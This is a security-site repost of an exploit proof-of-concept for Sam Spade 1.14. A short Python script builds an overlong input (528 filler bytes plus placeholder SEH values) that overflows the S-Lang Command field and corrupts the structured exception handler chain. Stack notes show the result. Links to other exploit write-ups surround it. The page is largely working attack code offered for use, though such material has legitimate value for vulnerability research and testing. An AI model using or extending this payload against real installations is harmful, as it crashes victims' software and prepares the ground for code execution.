首页 | 安全文章 | 安全工具 | Exploits | 本站原创 | 关于我们 | 网站地图 | 安全论坛
  当前位置:主页>安全文章>文章资料>Exploits>文章内容
Sam Spade 1.14 - S-Lang Command Field SEH Overflow
来源:mail@nipunjaswal.info 作者:Jaswal 发布时间:2015-11-13  
#!/usr/bin/env python
# Exploit Title     : Sam Spade 1.14 S-Lang Command Field SEH Overflow Crash PoC
# Discovery by      : Nipun Jaswal
# Email             : mail@nipunjaswal.info
# Discovery Date    : 12/11/2015
# Vendor Homepage   : http://samspade.org
# Software Link     : http://www.majorgeeks.com/files/details/sam_spade.html
# Tested Version    : 1.14
# Vulnerability Type: Denial of Service (DoS) Local
# Tested on OS      : Windows XP Professional SP2 x86 es
# Crash Point       : Go to Tools > S-Lang Command> Enter the contents of 'sam_spade_slang_dos.txt' > OK , Note: Do Not Remove the round bracket
##########################################################################################
#  -----------------------------------NOTES----------------------------------------------#
##########################################################################################
# And the Stack
#00FBFE80   41414141  AAAA
#00FBFE84   41414141  AAAA
#00FBFE88   42424242  BBBB  Pointer to next SEH record
#00FBFE8C   43434343  CCCC  SE handler
 
# After the execution of POC, the SEH chain looks like this:
#Address    SE handler
#00FBFE88   43434343
#42424242   *** CORRUPT ENTRY ***
 
f = open("sam_spade_slang_dos.txt", "w")
Junk_a = "A"*528
nseh= "B" * 4
seh= "C" *4
 
f.write(Junk_a+nseh+seh)
f.close()
 
[推荐] [评论(0条)] [返回顶部] [打印本页] [关闭窗口]  
匿名评论
评论内容:(不能超过250字,需审核后才会公布,请自觉遵守互联网相关政策法规。
 §最新评论:
  热点文章
·CVE-2012-0217 Intel sysret exp
·Linux Kernel 2.6.32 Local Root
·Array Networks vxAG / xAPV Pri
·Novell NetIQ Privileged User M
·Array Networks vAPV / vxAG Cod
·Excel SLYK Format Parsing Buff
·PhpInclude.Worm - PHP Scripts
·Apache 2.2.0 - 2.2.11 Remote e
·VideoScript 3.0 <= 4.0.1.50 Of
·Yahoo! Messenger Webcam 8.1 Ac
·Family Connections <= 1.8.2 Re
·Joomla Component EasyBook 1.1
  相关文章
·TUDU 0.82 - Local Stack-Based
·vBulletin 5.1.2 Unserialize Co
·TACK 1.07 - Local Stack-Based
·Idera Up.Time Monitoring Stati
·FBZX 2.10 - Local Stack-Based
·Idera Up.Time Monitoring Stati
·IBM Installation Manager 1.8.1
·ClipperCMS 1.3.0 - Code Execut
·Jenkins 1.633 - Unauthenticate
·XCart 5.2.6 - Code Execution V
·Huawei HG630a and HG630a-50 -
·foobar2000 1.3.9 - (.asx) Loca
  推荐广告
CopyRight © 2002-2022 VFocuS.Net All Rights Reserved